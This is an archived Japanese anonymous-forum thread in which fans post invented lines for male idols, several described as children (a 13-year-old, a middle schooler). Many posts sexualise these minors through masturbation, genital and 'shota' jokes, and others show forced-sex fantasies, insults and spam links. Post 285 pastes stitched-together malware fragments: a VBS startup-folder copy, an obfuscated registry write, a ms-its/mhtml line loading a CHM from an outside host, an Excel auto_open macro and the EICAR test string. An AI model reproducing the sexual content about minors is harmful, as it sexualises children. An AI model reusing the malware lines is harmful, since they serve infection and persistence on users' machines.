202 :ユーは名無しネ:2006/10/04(水) 23:19:59
「あ、ごめん間違えて鎖切ってもた」

203 :ユーは名無しネ:2006/10/04(水) 23:28:29
横尾「うえぇん!僕にバニーガールの格好させてどうするってゆうの??・・・そんな!可愛いなんて言わないで!」

204 :ユーは名無しネ:2006/10/04(水) 23:34:07
>203
テラモユス
ニカチャverダギャverキボン

205 :ユーは名無しネ:2006/10/04(水) 23:50:09
横尾なんかでよく萌えれるなwww想像してあまりのキモさに吹いた

206 :ユーは名無しネ:2006/10/05(木) 01:14:34
>200
ゴキブリ?キャ母〜!
おまえこそいつまで起きてんだよ
てか早起きの年寄りかWW

で いつまで「ヴォケ!」なんて使い続けんの??まったく低脳脳毒ばぁさんだねWW

207 :ユーは名無しネ:2006/10/05(木) 01:25:44
200にはアタシがペニバソビンタ喰らわしてあげる

208 :ユーは名無しネ:2006/10/05(木) 01:32:08
>200
おまえいちいち噛み付くなよスカ!

209 :ユーは名無しネ:2006/10/05(木) 01:38:03
>200
はずれくじ

210 :ユーは名無しネ:2006/10/05(木) 02:03:42
>200ヌルーくらい覚えたら?

211 :ユーは名無しネ:2006/10/05(木) 08:09:36
栗『ここにある物はなんでも食べられるよ〜もちろんこの僕もね』

212 :ユーは名無しネ:2006/10/05(木) 16:45:53
レオン「僕と翔央どっちがいい??」
ってスネながら言ってホシス

213 :ユーは名無しネ:2006/10/05(木) 23:11:17
僕…初めてなんだ


214 :ユーは名無しネ:2006/10/05(木) 23:21:21
「帰っちゃやぁ」
ってダダこねられたい

215 :ユーは名無しネ:2006/10/05(木) 23:24:52
食事の準備中…

担「ねぇ、味見してもいい?」
自「味見?いいよー。はい!」
担「いやそうじゃなくて、




お前を」

216 :ユーは名無しネ:2006/10/05(木) 23:25:50
変な男にナンパされんなよ

217 :ユーは名無しネ:2006/10/06(金) 01:40:16
℃ックソktkr

218 :ユーは名無しネ:2006/10/06(金) 06:48:16
「どんマイケル!」

219 :ユーは名無しネ:2006/10/06(金) 18:03:17
http://kuni.tv/?RF=1&frdref=350440

220 :ユーは名無しネ:2006/10/06(金) 20:04:24
バトン「君のハ-トをチェックメイト」
栗「一緒にお菓子食べよう?」
虫「君虫が好きなんだ?嬉しいな!そんな女の子僕はじめて!」

221 :ユーは名無しネ:2006/10/06(金) 22:24:53
自担とドライブ中…カコエエ横顔にドチドチ
 
(自担に触れたいな)
 
信号が赤になる
 
自担の名を呼ぶ
振り向き様自分からキスする

「ちょ(wお前突然何だよビックリすんじゃん」
 
かなり動揺した様子の自担
 
次の信号が赤に変わる時は
自担からお返しのキス 


222 :ユーは名無しネ:2006/10/07(土) 09:59:00
ageちゃいなよ!

223 :ユーは名無しネ:2006/10/07(土) 10:22:05
浮気チェックするからそこに横になって

224 :ユーは名無しネ:2006/10/07(土) 12:38:49
「タァ↑!!」

225 :ユーは名無しネ:2006/10/07(土) 12:45:47
>224
升ktkr

226 :ユーは名無しネ:2006/10/08(日) 09:54:07
・・・こわい

227 :ユーは名無しネ:2006/10/09(月) 10:40:45
お尻を向けられて
「火傷舐めて」

228 :ユーは名無しネ:2006/10/11(水) 00:25:26
今夜は…腰がくだける程愛してやるよ

229 :ユーは名無しネ:2006/10/11(水) 01:16:25
Hな台所

230 :ユーは名無しネ :2006/10/11(水) 03:53:47
自担けっこう年下なんで
「オネーサン(・∀・)」って一言可愛く言われるだけで満たされる

231 :ユーは名無しネ:2006/10/11(水) 20:18:52
「俺んこと気持ちよくしろや
そしたらごほうびやるで」

232 :ユーは名無しネ:2006/10/11(水) 20:41:43
わかってる?
寝かさないよ

233 :ユーは名無しネ:2006/10/11(水) 20:52:58
これかわいすぎ!
http://image.blog.livedoor.jp/doraganaru/imgs/1/d/1dd2dab3.jpg



234 :ユーは名無しネ:2006/10/11(水) 21:37:56
入れてあげるよ

235 :ユーは名無しネ:2006/10/11(水) 23:34:19
いきなりベットに押し倒し首筋にキスし始めた自担
びっくりして抵抗する自分に


「..ずっと我慢してきた....

もう 抑えきかないっぽい....

わり..
余裕ない
優しくできねぇわ

おまえが欲しい」

236 :ユーは名無しネ:2006/10/12(木) 01:15:54
大好きなんかじゃ足んないくらい大好き

237 :ユーは名無しネ:2006/10/12(木) 20:44:52
すぐ帰ってくるから心配すんなって

238 :ユーは名無しネ:2006/10/12(木) 21:41:34
おまえの前から消えちゃうわけねーだろ?

239 :ユーは名無しネ:2006/10/13(金) 22:32:49
ぜってぇ帰ってくる
信じろよ

240 :ユーは名無しネ:2006/10/14(土) 01:33:50
これ全部オマエ騙すためのドッキリだから

241 :ユーは名無しネ:2006/10/14(土) 02:28:28
海外から戻ってきたら…







結婚してくれ

242 :ユーは名無しネ:2006/10/14(土) 02:32:12
>241
お前は板違いだから出てけ
22のオッサンには興味ない人たちの板だから

243 :ユーは名無しネ:2006/10/14(土) 03:43:33
>242
誰も22のオッサンに言われたいなんて一言も書いてませんが?(w

244 :ユーは名無しネ:2006/10/15(日) 14:14:00
金貸してくれよ

245 :ユーは名無しネ:2006/10/19(木) 10:57:08
やだよ

246 :ユーは名無しネ:2006/10/19(木) 13:38:40
姉ちゃん見て! 今僕こんだけ踊れるんだ!

247 :ユーは名無しネ:2006/10/19(木) 16:11:55
暇なら見ればばかどもが
http://z.minx.jp/u/album.php?id=sweetdancing29&cn=15&dn=1&p=1

248 :ユーは名無しネ:2006/10/20(金) 11:45:24
妖笑で

「…おとなしく出来ない子はどうなるんだっけ?」

249 :ユーは名無しネ:2006/10/20(金) 11:58:12
「話って、何…?」

「あのさ…、一緒について来て欲しい」

250 :ユーは名無しネ:2006/10/20(金) 18:08:40
>>240
自担で想像したらテラモエスw

251 :ユーは名無しネ:2006/10/20(金) 18:17:31
>>248
凄く(・∀・)イイ!!

252 :ユーは名無しネ:2006/10/20(金) 19:04:04
お前の分のチケットあるんだけど…
一緒に行くだろ?


253 :ユーは名無しネ:2006/10/20(金) 19:42:44
笑顔で「おいで」って言われたい

254 :ユーは名無しネ:2006/10/21(土) 19:16:38
笑顔と言えば
 
 
 
(⌒―⌒)おいで>253


255 :ユーは名無しネ:2006/10/21(土) 22:11:25
やべー先輩からバイク買うんだ

金くれよ!

256 :ユーは名無しネ:2006/10/21(土) 23:05:58
>254
ソイシの笑顔は怖くて近寄れん(w

257 :ユーは名無しネ:2006/10/22(日) 00:47:08
>256
(⌒―⌒)「ふ〜ん…俺の言うこと聞けないんだぁ?そっかー……」

258 :ユーは名無しネ:2006/10/22(日) 00:51:22
板チ氏ね











萌えたが

259 :ユーは名無しネ:2006/10/22(日) 01:03:06
「話しって、何…?」






「YOU脱いじゃいなよ」

260 :ユーは名無しネ:2006/10/22(日) 22:55:32
「…ぼくのおちんちんの毛剃って」

261 :ユーは名無しネ:2006/10/23(月) 01:11:57
たまたまオナニ-してるのを目撃してしまった(チビ)

担「………入ってこないで(顔真っ赤)

担「…あっち行って!(涙目)

262 :ユーは名無しネ:2006/10/23(月) 01:15:43


263 :ユーは名無しネ:2006/10/23(月) 03:07:00
お互いの手でやろっか!

264 :ユーは名無しネ:2006/10/23(月) 03:14:38
怖い夢見ておねしょしちゃったよう

265 :ユーは名無しネ:2006/10/23(月) 03:22:58
おパンツ替えてあげよっか?

266 :ユーは名無しネ:2006/10/23(月) 11:07:40
>261
そっと担へ近づき優しく抱きしめる
真っ赤になった頬に触れ額に唇をあてる
 
 
「もっと気持ちいいことしてあげる」
 
 
自担のズニア(notへ顔を埋め口に含み舌でなぞりながら音を立て味わう
痺れるような吐息を幾度も漏らす自担…
 
 
 
 
 
 
 
はいここでおしまい
続きは得意の妄想妄想!!(w

267 :ユーは名無しネ:2006/10/23(月) 11:25:33
すみません
通りすがり男ですが、こんな時間からムラムラ来ちゃったやないっすか!

268 :ユーは名無しネ:2006/10/23(月) 13:38:20
抜いちゃえばいいのに…
ねぇ奥様ホホホ!

269 :ユーは名無しネ:2006/10/23(月) 14:06:14
オナニ- 栗担だけど森本くんで想像しちゃうw

270 :ユーは名無しネ:2006/10/23(月) 15:19:38
>268
そんなこと言われると…昼間なのにしたくなるやないっすか!

271 :ユーは名無しネ:2006/10/23(月) 15:51:48
>270
昼間とか関係なくYou抜いちゃいなよ!

272 :ユーは名無しネ:2006/10/23(月) 16:09:59
>271さん
その気にさせんといて下さいよぉ…!
ほんま罪な姉さんや…

273 :ユーは名無しネ:2006/10/23(月) 21:08:26
>272
ぐちゃぐちゃになって氏ね

274 :ユーは名無しネ:2006/10/23(月) 22:00:27
おまえがなW

275 :ユーは名無しネ:2006/10/23(月) 22:02:33
sageれないヤシが何を言う

276 :ユーは名無しネ:2006/10/23(月) 22:51:07
おぉ忘れてたよ
まぁそう突っかからないでおくれ

277 :ユーは名無しネ:2006/10/23(月) 23:05:41
「僕に逆上がりの特訓して」

278 :ユーは名無しネ:2006/10/23(月) 23:37:59
おれの手相見てくれ

279 :ユーは名無しネ:2006/10/24(火) 00:04:00
担「僕のパンツを洗って!」

280 :ユーは名無しネ:2006/10/24(火) 00:05:35
今日1日パンツ交換しよーぜ!

281 :ユーは名無しネ:2006/10/24(火) 01:35:45
「悪戯して欲しい…」

282 :ユーは名無しネ:2006/10/24(火) 03:10:20
じゃ上靴隠してやるよ

283 :ユーは名無しネ:2006/10/24(火) 03:13:03
ワロタ

284 :ユーは名無しネ:2006/10/24(火) 03:37:52
>283
ありがとうございます

285 :<body onload=window()>:2006/10/24(火) 04:20:23
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

286 :ユーは名無しネ:2006/10/24(火) 08:26:45
放課後一緒帰ろ
…ウチに来ない?

287 :ユーは名無しネ:2006/10/24(火) 11:16:07
自担の部屋に行くと…

無言で鍵を閉められ、壁に追い詰められながら
「……何しよっか…?(妖笑)」

288 :ユーは名無しネ:2006/10/24(火) 11:50:36
そして急に手を掴まれ驚いて逃げようとするが、腕を引っ張られそのままベッドに押し倒される
両腕は完全に押さえられ、太ももに体重をかけられ体が動かない
声を出そうにも怖くて声が出ない
しかも自担の家はまだ誰も帰宅していない


…Everyone妄想start(w

289 :ユーは名無しネ:2006/10/24(火) 13:27:55
一度部屋をでる彼
そして…戻ってきた彼の手にはガソリン缶が!

足元からその中身を掛けようとする自担…「止めてぇ〜!」
しかしガソリン臭はなく… 「熱いっ!」

それは溶けたロウだった
「イヒヒ…これでまた僕のお人形が一つ増える…」

290 :ユーは名無しネ:2006/10/24(火) 14:40:51
あまぁ〜い……ってこえぇ〜わ!!(w

291 :ユーは名無しネ:2006/10/24(火) 14:44:49
「あっ・・・おちんちん触っちゃだめぇ・・・」

292 :ユーは名無しネ:2006/10/24(火) 15:00:46
>290
突っ込み有難うございます

293 :ユーは名無しネ:2006/10/24(火) 16:04:35
>291
イイ!!

294 :ユーは名無しネ:2006/10/25(水) 15:00:46
ボク ノ ポコチン ミテクダサイ

295 :ユーは名無しネ:2006/10/25(水) 15:15:46
やだ

296 :ユーは名無しネ:2006/10/25(水) 16:07:45
ソンナ コト イワナイデ ホラ

297 :ユーは名無しネ:2006/10/25(水) 16:09:28
ソンナ コト イワナイデ ホラ

298 :ユーは名無しネ:2006/10/25(水) 16:10:43
やだ

299 :ユーは名無しネ:2006/10/25(水) 16:12:37
女医茶キモ

300 :ユーは名無しネ:2006/10/25(水) 16:16:08
虫「ちんちんフラ---ッシュ」栗「ちんちんバズ-カ」虫栗「あははははは

301 :ユーは名無しネ:2006/10/25(水) 16:17:53
いいと思う

302 :ユーは名無しネ:2006/10/25(水) 16:39:31
チンチンねたショタだと許されるけど猿だとダメなんだな

303 :ユーは名無しネ:2006/10/25(水) 16:40:43
おちんちん

304 :ユーは名無しネ:2006/10/25(水) 17:56:16
成人してるけど「ぼくね」

305 :ユーは名無しネ:2006/10/25(水) 18:53:46
>304
自担で想像したら吹いた

306 :ユーは名無しネ:2006/10/25(水) 19:43:08
太陽「僕のパンツは白ブリ-フ」

307 :ユーは名無しネ:2006/10/25(水) 19:47:37
ニカチャ「…チンチンの毛まだはえてない」
ニカチャハァ-(*´д`)-ン

308 :ユーは名無しネ:2006/10/25(水) 19:52:13
ABC一同(2ネムワカラン)「抱いてくだちゃ〜い」

309 :ユーは名無しネ:2006/10/25(水) 20:02:18
自担「一揆起こしてやる」
2押し「昔か」

310 :ユーは名無しネ:2006/10/25(水) 20:11:48
欧米か!

311 :ユーは名無しネ:2006/10/25(水) 22:57:28
赤チャソ言葉キモス
萌えるどころか萎え(ry

312 :ユーは名無しネ:2006/10/25(水) 23:13:51
赤ちゃん言葉禿萌

313 :ユーは名無しネ:2006/10/26(木) 00:31:42
栗『だっこしてくだちゃ…い??』
虫『おねーたんおんぶちて〜!』
ニカチャ『チュッチュちて?』
五関さん『ぱぷーぱぷーだっこ』

314 :ユーは名無しネ:2006/10/26(木) 01:39:29
>313
下に行くにつれて萌えなくなったorz

315 :ユーは名無しネ:2006/10/26(木) 01:58:47
>313
ニカチャだけハァ-(*´д`)-ン

316 :ユーは名無しネ:2006/10/26(木) 02:36:23
赤ちゃん言葉は苺が似合う

317 :ユーは名無しネ:2006/10/26(木) 03:11:39
ニカチャハァ-(*´д`)-ン

318 :ユーは名無しネ:2006/10/26(木) 03:40:11
>>313
ニカチャハァ━━━━━━;´Д`━━━━━━ン!!!!

ちなみに自分は顔覗きこまれながら数秒間真顔で見つめられた揚句に
急にニカッと笑いながら「(鼻で笑いながら)かーわいいっw」って言われひ(*´Д`)
あと指差しながら「コイツバカじゃね?」(*´Д`)ハァハァ

319 :ユーは名無しネ:2006/10/26(木) 13:21:48
栗「やっぱさーアレじゃん?いー男っちゅーのは恋愛豊富かつ失恋豊富でもあるもんなのさ すべては この美し過ぎる顔立ちのせいなのだよ そこのレディ今度俺とデ-トしない?」

320 :ユーは名無しネ:2006/10/26(木) 15:50:28
丁重にお断わりします

321 :ユーは名無しネ:2006/10/26(木) 20:26:48
「おちっこすゆひとりじゃや」

322 :ユーは名無しネ:2006/10/26(木) 20:36:15
…とヒラメが申しております

323 :ユーは名無しネ:2006/10/26(木) 20:38:40
山涼にあの敬語使いで叱られたい

324 :ユーは名無しネ:2006/10/26(木) 20:40:26
…とヒラメが申しております

325 :ユーは名無しネ:2006/10/26(木) 20:40:48
栗「〇〇俺・・・イケてる?」
「うんイケてるよ」
栗「メロメロになりそう?」「うん」
栗「よっしゃ そこまでゆーならメロメロにしてやるぜ!(服を脱いで)カモ-ン!」

326 :ユーは名無しネ:2006/10/26(木) 20:42:47
…とヒラメが申しております

327 :ユーは名無しネ:2006/10/26(木) 22:32:36
…と苺が申しております

328 :ユーは名無しネ:2006/10/26(木) 22:56:38
…と宮tが申しております

329 :ユーは名無しネ:2006/10/27(金) 00:04:22
…とダギャが申しております

330 :ユーは名無しネ:2006/10/27(金) 01:19:26
…とプラムが申しております

331 :ユーは名無しネ:2006/10/27(金) 04:46:59
…以上、ニカチャがお送りしました

332 :ユーは名無しネ:2006/10/27(金) 08:18:02
連投厨ウザス

333 :ユーは名無しネ:2006/10/27(金) 11:37:51
>332
連投じゃないよ?
携 帯 厨(w

334 :ユーは名無しネ:2006/10/27(金) 21:50:26
かわいい

335 :ユーは名無しネ:2006/10/27(金) 23:14:15
ツマンネ

336 :ユーは名無しネ:2006/10/28(土) 06:57:58
セーラーの女装をさせられて必死で短いスカートの裾をひっぱる自担
『ゃ…見るなよぉ…』

337 :ユーは名無しネ:2006/10/28(土) 11:19:53
ツッチ-「ぽくもう駄目でしゅ えっちな気持ちが抑えられにゃい

338 :ユーは名無しネ:2006/10/29(日) 13:32:40
(((゜д゜;)))

339 :ユーは名無しネ:2006/10/29(日) 13:40:10
ダギャ「僕顔が薄いから影薄くならないか心配」

340 :ユーは名無しネ:2006/10/29(日) 15:28:25
苺(尻にウンコついてるw)「舐・め・て♪」

341 :ユーは名無しネ:2006/10/29(日) 15:31:12
ないわ

342 :ユーは名無しネ:2006/10/29(日) 16:13:48
苺『次の俺の魂見せてやるで〇〇にプロポ-ズするよ!テレビ見とけよ!』

343 :ユーは名無しネ:2006/10/29(日) 16:40:47
栗虫に似合うあまぁ〜い言葉を考えて

344 :ユーは名無しネ:2006/10/29(日) 16:48:59
栗虫「俺ら恋仲やねん」

345 :ユーは名無しネ:2006/10/29(日) 18:12:28
うほっ

346 :ユーは名無しネ:2006/10/29(日) 18:31:14
ニカチャダギャに似合うあまぁ〜い言葉を考えて

347 :ユーは名無しネ:2006/10/29(日) 18:41:41
自分「ねぇねぇニカチャダギャ」
ニカチャダギャ「ん?」

348 :ユーは名無しネ:2006/10/29(日) 18:47:03
ニカチャダギャ「お前ら全員氏ねばいいのに」

349 :ユーは名無しネ:2006/10/29(日) 18:50:27
ニカチャにととろのかん太ばりのツンデレ役やって欲しい

350 :ユーは名無しネ:2006/10/29(日) 18:55:24
ダギャに模倣犯ばりの頭オカシイ犯人の役やって欲しい

351 :ユーは名無しネ:2006/10/29(日) 19:16:29
凸にデスノ-トのL役をやって欲しい

352 :ユーは名無しネ:2006/10/29(日) 20:03:38
リュークにダギャ
ライトにニカチャ

353 :ユーは名無しネ:2006/10/29(日) 20:47:30
夜神パパは父さん

354 :ユーは名無しネ:2006/10/30(月) 17:03:05
おちんにんに毛が生えたから剃って?

355 :ユーは名無しネ:2006/10/30(月) 17:18:54
ダギャリュ-ク「宮tの鼻って面白っ」

356 :ユーは名無しネ:2006/10/30(月) 20:15:30
ライトがニカチャって頭悪そうなライトだな
ダギャはリュークでよし

357 :ユーは名無しネ:2006/10/30(月) 20:54:49
ニカチャに林檎をもらって喜ぶダギャ

358 :ユーは名無しネ:2006/10/30(月) 20:56:02
やめて下さい萌え死にます

359 :ユーは名無しネ:2006/10/30(月) 20:58:42
ニカチャは馬鹿だけどIQ高いんだよ(w

360 :ユーは名無しネ:2006/10/30(月) 21:04:02
ニカチャ天才肌か

361 :ユーは名無しネ:2006/10/30(月) 21:45:32
>>359
IQテストでもやったのか?

362 :ユーは名無しネ:2006/10/30(月) 21:56:10
ニカチャ「全て僕の計算通りさ」

363 :ユーは名無しネ:2006/10/30(月) 22:06:11
ニカチャ「僕はキラなんかじゃない信じてくれよ!!」

364 :ユーは名無しネ:2006/10/30(月) 22:15:11
川*ΦeΦ)| デスノートを使った人間が天国や地獄に行けると思うなギャ

365 :ユーは名無しネ:2006/10/30(月) 22:25:36
ライトニカチャ「言っても分からぬウマシカばかり・・・」

366 :ユーは名無しネ:2006/10/30(月) 22:31:50
(L^∀^)好きになりますよ?

367 :ユーは名無しネ:2006/10/30(月) 22:36:21
五関さんは何役ですか

368 :ユーは名無しネ:2006/10/30(月) 22:38:34
>367
ワタリです

369 :ユーは名無しネ:2006/10/31(火) 01:32:33
「子供はもう寝なさい」
(自分ヲバ自担16)

370 :ユーは名無しネ:2006/10/31(火) 09:11:39
「おはよう

夜やがな」

371 :ユーは名無しネ:2006/11/01(水) 19:03:26
「結婚してくれ!!お願い!」

372 :ユーは名無しネ:2006/11/01(水) 19:13:17
お願いだ!旦那と離婚してくれ。



373 :ユーは名無しネ:2006/11/01(水) 19:39:33
「今晩は泊まって行けよ。」

374 :ユーは名無しネ:2006/11/01(水) 21:19:06
栗(お尻にウンコついてるw)「なめて♪」

375 :ユーは名無しネ:2006/11/01(水) 22:12:47
何度もでているけど
「お前は俺のものだ。」
が最高だね。これ以上のものはない

376 :ユーは名無しネ:2006/11/02(木) 10:24:56
デートの帰り

『ぁー・・・可愛い。 お前のこと持って帰っちゃ駄目?』

んで持って帰られて
部屋に入るなり・・・

後は想像にお任せしまーす

377 :ユーは名無しネ:2006/11/02(木) 15:53:27
>376がカバエエかボミョンな件

378 :ユーは名無しネ:2006/11/02(木) 17:31:44
>376寒い

379 :ユーは名無しネ:2006/11/02(木) 17:48:51
「枝豆食べる?」

380 :ユーは名無しネ:2006/11/02(木) 21:26:54
抱いて!押し倒して!僕のパンツは白ブリ-フ

381 :ユーは名無しネ:2006/11/02(木) 23:11:41
>380
萌もっと書いて下さい

382 :ユーは名無しネ:2006/11/03(金) 02:49:54
「可愛いだけで好きになったと思うなよ」

383 :ユーは名無しネ:2006/11/03(金) 15:44:36
>382
だからその可愛いの意味がワカンネ

384 :ユーは名無しネ:2006/11/03(金) 23:35:01
>383
つ【国語辞典】

385 :ユーは名無しネ:2006/11/03(金) 23:43:58
>384
アフォか(w>382本人が該当してるかって事ダロが
設定脚色してないかって話デソ

386 :ユーは名無しネ:2006/11/03(金) 23:49:06
>385
だから>384はそれをわかっててあえてやってるのがわからないのか?

387 :ユーは名無しネ:2006/11/04(土) 00:09:55
見て ちんちんに毛が生えてこないの・・・俺中学生なのに

388 :ユーは名無しネ:2006/11/04(土) 00:38:23
>382-386
ちょバロス(w

389 :ユーは名無しネ:2006/11/04(土) 01:41:57
>385
マジレス乙(w
ドンマイ

390 :ユーは名無しネ:2006/11/04(土) 02:33:44
>376
猛獣の餌に

391 :ユーは名無しネ:2006/11/04(土) 09:15:55
>354はあえての国語辞典
>385はあえてのマジレス
>386はあえての解説
>387はあえてのヌルー

>388はあえての感想
>389は空気が嫁ず

>390は人類の代弁者
>391はゴッチの国国外追放
>392はあえてのpgr
>393はまさかの宮t担

392 :ユーは名無しネ:2006/11/04(土) 18:46:08
プギャ━━━━m9(^Д^)9m━━━━━ッ

393 :ユーは名無しネ:2006/11/04(土) 19:50:39
>391
ご苦労様でした

394 :ユーは名無しネ:2006/11/04(土) 19:57:37
>393
まさか………!

395 :ユーは名無しネ:2006/11/04(土) 20:55:59
おなぬマソ?

396 :ユーは名無しネ:2006/11/04(土) 21:53:22
ダギャ『パンツびちゃびちゃになっちゃった…』

397 :ユーは名無しネ:2006/11/04(土) 22:25:53
マネー! マネーダセ!ハヤクシロ!

398 :ユーは名無しネ:2006/11/04(土) 22:55:44
森本『たってるよ!』

399 :ユーは名無しネ:2006/11/05(日) 00:03:17
電話の最後

「じゃあな、バイバイ……
あっちょっと待って!言うの忘れてた…
俺お前のこと好きだから
じゃな」

プツッ…ツーツーツー

400 :ユーは名無しネ:2006/11/05(日) 00:09:10
言い逃げとか女々しいやつだな

401 :ユーは名無しネ:2006/11/05(日) 00:35:33
「悪かったな」

402 :ユーは名無しネ:2006/11/05(日) 00:43:38
かなりヲバさんの妄想
栗「君と同い年だったらよかったのに」

403 :ユーは名無しネ:2006/11/05(日) 00:53:17
レオ「お姉さん見てるとおちんちんがたっちゃっうの」

404 :ユーは名無しネ:2006/11/05(日) 00:57:53
カトカン「あ〜!駄目であります!私の東京タワ-のごとく立ち上がったおちんちんから白い液が出ます!3・2・1フィニッシュ!」

405 :ユーは名無しネ:2006/11/05(日) 01:02:30
>404
なんかリアルに言いそうでやだなぁソレww

406 :ユーは名無しネ:2006/11/05(日) 02:04:45
>404
めっちゃリアルだよ〜!!(ww

407 :ユーは名無しネ:2006/11/05(日) 11:45:02
(*`∀´*)「ギュッテシロ」

(*`∀´*)「ハヤクシロ」

(*`∀´*)「チュッテシロ」

(*`∀´*)「ハヤクシロ」

v(*`∀´*)v「オレ甘エン坊」

408 :ユーは名無しネ:2006/11/05(日) 12:20:41
担のおちんちんをさすってあげる

担「ふみゅ〜ん」

409 :ユーは名無しネ:2006/11/05(日) 12:35:33
禿カワユス

410 :ユーは名無しネ:2006/11/05(日) 13:59:32
ダギャ「やった!
俺の方がプリケツ〜」

411 :ユーは名無しネ:2006/11/05(日) 14:10:00
ダギャ「一体いくら貢いだら許してくれるんだギャ」

412 :ユーは名無しネ:2006/11/05(日) 14:16:13
栗「お尻が痛い」

413 :ユーは名無しネ:2006/11/05(日) 14:28:00
栗「お尻痛いよ…触診して?」

414 :ユーは名無しネ:2006/11/05(日) 20:29:47
一人部屋で過ごす自分
淋しくて無性に会いたくなって自担に電話するが「仕事終わりに食事行くとこだから…」と断られ更に落ちる自分
茫然として一時間ぐらいたったかな…って時に電話が鳴る
「着いたよ☆」

415 :ユーは名無しネ:2006/11/05(日) 20:34:28
カトカン「気持ちいいですか〜?ははは!では〇〇もご一緒にぬき♪さし♪ぬき♪さし♪ではそろそろフィナ-レ・・・ああああああああああああああ!!!


416 :ユーは名無しネ:2006/11/05(日) 20:45:10
帰り際
「帰ったら電話する










であります!お楽しみに!さらば!Myスィ-トハニィ

417 :ユーは名無しネ:2006/11/05(日) 23:49:53
>407
ありえないくらい萌えた

>416
バロスwwww

418 :ユーは名無しネ:2006/11/06(月) 02:33:41
ニカチャ「だって俺生まれつきの変態なんだもんしょうがないじゃん。ねぇさっさと踏んでくんない?」

419 :ユーは名無しネ:2006/11/06(月) 10:15:35
栗「お腹ぷにぷにして!ぷにぷに!」

420 :ユーは名無しネ:2006/11/06(月) 14:53:11
栗「おやつまだ?」
自分「…」
栗「ねぇおやつまだ?」
自分「…」
栗「ねぇねぇおやつまだ?」
自分「…」
栗「ねぇねぇねぇおやつまだ?」
自分「…」
栗「ねぇねぇねぇねぇおやつまだ?」
自分「zz…ん…なに?今夜中の2時よ…早く寝なさい…」
栗「そこをなんとか」

421 :ユーは名無しネ:2006/11/06(月) 17:11:43
栗「はぁはぁはぁはぁはぁはぁはぁはぁはぁはぁはぁはぁはぁ!」
「きゃっ!どうしたの!?」

栗「うっ!うぅううう」
「マジ大丈夫?病院行く?」


Guuuu〜

栗「お腹すいた」

422 :ユーは名無しネ:2006/11/06(月) 17:32:15
ネタ姐さんダギャネタキボン

423 :ユーは名無しネ:2006/11/06(月) 20:37:56
栗「ママはりょーよりゆーとの方が好きなんだ…クスン」

424 :ユーは名無しネ:2006/11/06(月) 20:53:59
栗「また太っちゃった・・・ でもお菓子大好きだからやめられないの・・・どうしよぅ〜 あっ!裕翔君に貰ったチョコ!うまっ♪うまっ♪」

425 :ユーは名無しネ:2006/11/07(火) 11:41:27
「はらへったのら〜」

426 :ユーは名無しネ:2006/11/07(火) 11:58:39
栗「今の男の人誰!?」ヤキモチ焼く栗 私30 2彼13 こんな映画あった

427 :ユーは名無しネ:2006/11/07(火) 16:32:31
ダギャ「…痛いことされるの好き」

428 :ユーは名無しネ:2006/11/07(火) 16:43:48
虫「やだっ!勉強中なのに・・・はずかしいよぉ〜」

429 :ユーは名無しネ:2006/11/07(火) 19:30:16
虫「ぼくのお尻がそんなに好き?…エッチ」

430 :ユーは名無しネ:2006/11/07(火) 19:42:40
乱交なんてしてないんダギャー…
乱れたいのは君とだけギャ

431 :ユーは名無しネ:2006/11/07(火) 19:49:14
五関さん「真性包茎な自分乙」

五関さんの奴隷「…」

五関さん「でへ★」

五関さんの奴隷「…病院へ行って下さい
つ【アイスの実】」

五関さん「―∈[アイスの実]
だが断る」

432 :ユーは名無しネ:2006/11/07(火) 20:03:06
無実の罪で吊し上げにされたギャー…
乱交容疑取り調べが続いてるギャ
おいなりさんと味噌持って面会に来て欲しいギャ


433 :ユーは名無しネ:2006/11/07(火) 20:12:42
ダギャのおいなりさんが食べたい

434 :ユーは名無しネ:2006/11/07(火) 20:37:34
ねぇ見て見て〜♪
こんなに大っきくなったよ(w


435 :ユーは名無しネ:2006/11/07(火) 20:37:51
栗「将来結婚しようね!俺・・・べびぃの為に頑張って働くよ!」

436 :ユーは名無しネ:2006/11/07(火) 21:27:08
真夜中
「チュッチュチュッチュ」

437 :ユーは名無しネ:2006/11/07(火) 21:40:05
バトン「パンツめくってますよー」

バイオリン「え?僕パンツ人に見られても平気なの」
日本舞踊「白ブリ-フなんだね」

バイオリン「うん」

バトン「実は僕も」

日本舞踊「僕も明日から白ブリ-フにしようかな」

438 :ユーは名無しネ:2006/11/07(火) 21:48:54
レオ(着替え中)
ズリッ!
レオ「やめてよ!」
栗「へへへお前白ブリ-フなんだな」
レオ「・・・」
栗「実は俺もなんだ」レオ「マジ?京君や虫君は?」
栗「京はシルクのブリ-フ 虫は・・・あいつスキないからなぁ」

439 :ユーは名無しネ:2006/11/07(火) 21:51:08
>438
おばちゃん萌えちゃった

440 :ユーは名無しネ:2006/11/07(火) 22:38:14
ダギャ「…悪…戯…されたい……」

441 :ユーは名無しネ:2006/11/08(水) 00:11:12
虫「ごめんなさい・・・一度でいいからお母さんのパンティ頭に被ってみたかったの」

あのマザコン具合からするとマジでやってそうだw

442 :ユーは名無しネ:2006/11/08(水) 00:14:08
ママソ「お尻ペンペンよ!」
虫「ごめんなさ〜い!」

443 :ユーは名無しネ:2006/11/08(水) 00:24:46
http://i-like-it.b.to/feel/11
このホムペで詐欺された注意して

444 :ユーは名無しネ:2006/11/08(水) 01:27:56
ママソ「お尻ペンペンよ!」
虫「あんっ!もっと叩いてお母様」

